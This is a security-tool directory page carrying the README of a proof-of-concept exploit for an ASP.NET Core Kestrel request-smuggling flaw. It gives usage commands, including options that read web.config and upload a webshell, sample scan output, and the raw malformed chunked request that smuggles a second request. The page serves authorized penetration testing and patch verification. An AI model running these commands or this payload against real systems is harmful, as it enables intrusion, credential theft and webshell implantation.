Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55315-PoC-Exploit β€” CVE-2025-55315 PoC Exploit | Kitploit
Tools/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC Exploit

View Repository
85910 months agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

CVE-2025-55315 Pentest Tool

HTTP Request Smuggling Exploitation Tool for ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ LEGAL WARNING

THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY!

  • Use ONLY on systems you own or have explicit written authorization to test
  • Unauthorized access to computer systems is ILLEGAL
  • Tool creator is NOT responsible for misuse
  • By using this tool, you accept full legal responsibility

πŸ“‹ Overview

Professional penetration testing tool for CVE-2025-55315 (ASP.NET Core Kestrel HTTP Request Smuggling vulnerability). This tool is designed for single-target analysis with comprehensive exploitation capabilities.

What is CVE-2025-55315?

A critical HTTP Request Smuggling vulnerability in ASP.NET Core Kestrel web server (CVSS 9.9/10) that allows attackers to:

  • Bypass authentication
  • Steal credentials and session tokens
  • Perform Server-Side Request Forgery (SSRF)
  • Poison caches
  • Upload webshells and gain remote code execution

Affected Versions:

  • .NET Core 3.0 through .NET 9.0.9
  • Fixed in: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Features

Core Capabilities

  • βœ… Single Target Analysis - Focused penetration testing on specific target
  • βœ… Automatic Endpoint Discovery - Discovers common ASP.NET Core endpoints
  • βœ… Manual Endpoint Testing - Test specific endpoints of interest
  • βœ… Vulnerability Detection - Accurate CVE-2025-55315 detection
  • βœ… web.config Extraction - Read configuration files via request smuggling
  • βœ… Webshell Upload - Optional webshell deployment capability
  • βœ… Detailed Reporting - JSON and text format reports
  • βœ… Safety Features - Multiple confirmation prompts for destructive actions

Technical Features

  • HTTP/1.1 and HTTPS support
  • Custom port support
  • Configurable timeouts
  • Verbose debugging mode
  • Color-coded terminal output
  • SSL certificate validation bypass (for testing)

πŸ”§ Installation

Requirements

# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

πŸš€ Quick Start

Basic Vulnerability Scan

python3 cve_2025_55315_PoC.py -t target.com

This will:

  1. Gather server information
  2. Auto-discover active endpoints
  3. Test each endpoint for CVE-2025-55315
  4. Display results in terminal

Test Specific Endpoint

python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Full Scan with web.config Extraction

python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Advanced: Full Exploitation (Authorized Only!)

python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

πŸ“– Usage Examples

Example 1: Quick Check

Scenario: Check if production server is vulnerable

python3 cve_2025_55315_PoC.py -t api.mycompany.com

Expected Duration: 30-60 seconds


Example 2: Detailed Scan

Scenario: Comprehensive endpoint scan with verbose output

python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Expected Duration: 2-5 minutes


Example 3: Target Multiple Endpoints

Scenario: Test specific critical endpoints

python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Example 4: Non-SSL Target

Scenario: Test internal HTTP server

python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

πŸ“Š Command-Line Options

usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)
  -h, --help           Show help message

πŸ” Understanding the Output

Vulnerable System Example

Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  βœ— /api/login
    Details: Request smuggling successful - multiple responses
  βœ— /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  βœ“ web.config_read via /api/login

Interpretation:

  • πŸ”΄ CRITICAL VULNERABILITY DETECTED
  • πŸ”΄ Multiple endpoints are vulnerable
  • πŸ”΄ Configuration file was successfully extracted
  • ⚑ URGENT: Update to .NET 8.0.21+ or 9.0.10+

Secure System Example

Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] βœ“ Endpoint NOT vulnerable (400 Bad Request)

βœ“ No vulnerable endpoints found - target may be patched

Interpretation:

  • βœ… SYSTEM IS SECURE
  • βœ… Running patched Kestrel version
  • βœ… All malformed requests rejected

πŸ›‘οΈ Safety and Ethics

Authorization Checklist

Before running this tool, ensure:

  • You own the target system, OR
  • You have written authorization to test, AND
  • Security team has been notified, AND
  • You have a rollback plan, AND
  • You understand the legal implications

Built-in Safety Features

  1. Two-stage confirmation - Tool asks for authorization before starting
  2. Webshell upload confirmation - Requires typing "YES" in capitals
  3. Rate limiting - Delays between requests during auto-discovery
  4. Timeout protection - Prevents hanging connections
  5. Detailed logging - All actions are logged for audit trail

πŸ”¬ Technical Details

Exploitation Technique

The tool exploits CVE-2025-55315 using malformed chunked transfer encoding:

POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com

Why This Works:

  1. Proxy server sees \n as line terminator β†’ processes as single request
  2. Kestrel (vulnerable) ignores \n β†’ treats smuggled GET as separate request
  3. Smuggled request may execute in another user's session context

Detection Logic

Server ResponseInterpretationStatus
400 Bad RequestKestrel rejected malformed chunkβœ… Secure (patched)
Multiple HTTP/1.1Two separate responses received❌ Vulnerable
500 or 502Internal server error⚠️ Likely vulnerable
Normal 200 OKRequest accepted⚠️ Inconclusive

πŸ› Troubleshooting

Connection Failed

Download Tool